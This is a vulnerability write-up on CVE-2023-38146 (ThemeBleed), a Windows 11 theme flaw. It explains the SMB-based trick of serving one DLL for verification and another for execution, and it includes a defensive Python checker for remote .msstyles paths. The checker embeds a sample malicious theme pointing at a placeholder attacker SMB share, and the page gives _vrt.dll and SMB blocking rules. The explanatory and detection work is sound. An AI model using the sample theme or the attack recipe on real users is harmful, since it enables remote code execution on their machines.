Moderate
CVE-2023-38146
Description
Windows Themes Remote Code Execution Vulnerability
Ratings
Attacker Value: Medium
Exploitability: Low
Technical Analysis
CVE-2023-38146, a.k.a. ThemeBleed, was discovered by Gabe Kirkpatrick and is a time-of-check-to-time-of-use (TOCTOU) DLL hijacking vulnerability with a slight twist. Windows 11 versions 21H2 and 22H2 are vulnerable.
The vulnerability works because, under a specific set of circumstances, opening a theme file causes a DLL that is improperly checked to be loaded and run in the context of the user who opened the theme file.
Background
Windows .theme files are simple text files that reference Windows .msstyles files. .msstyles files are just .dll files under a different extension that contain resources for the theme, such as icons. While .msstyles files are PE files and follow the .dll format, they should not contain executable code.
Vulnerability
If a .theme file references an .msstyles file with a PACKME_VERSION of 999, a special code branch is taken during the loading process that causes the process to attempt a call to a function exported by an accompanying .dll file. That second DLL has the same path and name as the .msstyles file, with _vrt.dll appended.
To be safe, that second DLL is checked to ensure that it is a signed Microsoft .dll before it is loaded and the exported function is called.
The vulnerability lies in the improper verification of that .dll file. The verification and the loading are two separate actions: first the file is opened for reading and verified, then the file is opened for execution and loaded. If a malicious actor can tell the open-for-verification apart from the open-for-execution, they can arrange for a legitimate .dll to be presented for verification and a malicious .dll for execution.
One way that an attacker can control the files is by using a UNC path in the .theme file that points to an .msstyles file on an SMB server the attacker controls. If the hosted .msstyles file has a PACKME_VERSION value of 999, the theme loader will attempt to call a function contained in a .dll file on the same share. An SMB server must know the requested file access in order to enforce permissions, so the access the client wants (read versus execute) is carried in the open request sent to the SMB server. This lets the attacker's server return a legitimate, signed .dll when it receives a request to open the file for reading, and a malicious .dll when it receives a request to open the same file for execution.
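The .theme side of the attack is plain INI text, so the remote reference can be spotted before the file is ever opened by the theme loader. The following checker is an added example for this assessment, not code from the original page or from the ThemeBleed researcher. It relies on the real [VisualStyles] Path key that names the .msstyles file; the two sample themes embedded in it are constructed, and 203.0.113.10 is a documentation address standing in for an attacker-controlled share.

```python
"""Flag .theme files whose visual style points at a remote (UNC) .msstyles.

Added example for this assessment, not code from the original page or from the
ThemeBleed researcher. The [VisualStyles] Path key is the real .theme setting
that names the .msstyles file; the two sample themes below are constructed.
"""
import configparser
import re
from typing import Optional

# Constructed sample: a normal theme whose .msstyles lives on the local disk.
BENIGN_THEME = r"""
[Theme]
DisplayName=Example Theme

[VisualStyles]
Path=%SystemRoot%\resources\Themes\Aero\Aero.msstyles
ColorStyle=NormalColor
Size=NormalSize
"""

# Constructed sample: the .msstyles is fetched from an SMB share the attacker
# controls (203.0.113.10 is a documentation address used as a placeholder).
REMOTE_THEME = r"""
[Theme]
DisplayName=Totally Legit Theme

[VisualStyles]
Path=\\203.0.113.10\share\theme.msstyles
ColorStyle=NormalColor
Size=NormalSize
"""

# Matches \\host\share\... where host may be a name or an IP address.
UNC_RE = re.compile(r"^\\\\[^\\]+\\")


def _find_section(cp: configparser.ConfigParser, wanted: str) -> Optional[str]:
    """Windows INI section names are case-insensitive; configparser's are not."""
    for section in cp.sections():
        if section.lower() == wanted.lower():
            return section
    return None


def visual_styles_path(theme_text: str) -> Optional[str]:
    """Return the [VisualStyles] Path value, or None if the theme sets none."""
    # interpolation=None so %SystemRoot% is not mistaken for configparser syntax;
    # strict=False tolerates duplicate keys, which hand-edited INI files have.
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.read_string(theme_text)
    section = _find_section(cp, "VisualStyles")
    if section is None:
        return None
    value = cp.get(section, "Path", fallback=None)
    return value.strip().strip('"') if value else None


def is_remote_msstyles(theme_text: str) -> bool:
    """True when the theme's .msstyles would be loaded over the network."""
    path = visual_styles_path(theme_text)
    return path is not None and UNC_RE.match(path) is not None


if __name__ == "__main__":
    for label, theme in (("benign", BENIGN_THEME), ("remote", REMOTE_THEME)):
        print(f"{label}: Path={visual_styles_path(theme)} "
              f"remote={is_remote_msstyles(theme)}")
```

A .themepack is a cab archive wrapping a .theme plus its resources, so to apply the same check there, extract the archive first and run the checker over the .theme it contains.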
Further, the researcher who discovered the vulnerability also found that by packaging the theme file into a cab file named with the .themepack extension, the file no longer appears as a downloaded file, and the user is not prompted with a warning when they open it.
Mitigation
Microsoft patched this vulnerability by removing support for PACKME_VERSION 999. Patching is recommended, but because this is a very precise vulnerability with many moving parts, several mitigations exist in addition to patching. At the host filesystem level, alert on and block any open request for a file whose name ends in _vrt.dll; at the network level, alert on and block any SMB connection that requests a file ending in _vrt.dll. It is also likely safe for many environments to prevent SMB requests to hosts outside the enterprise entirely, or, better still, limit SMB connections to specific resources within the enterprise.
General Information
Vendors
- microsoft
Products
- windows 11 21h2,
- windows 11 22h2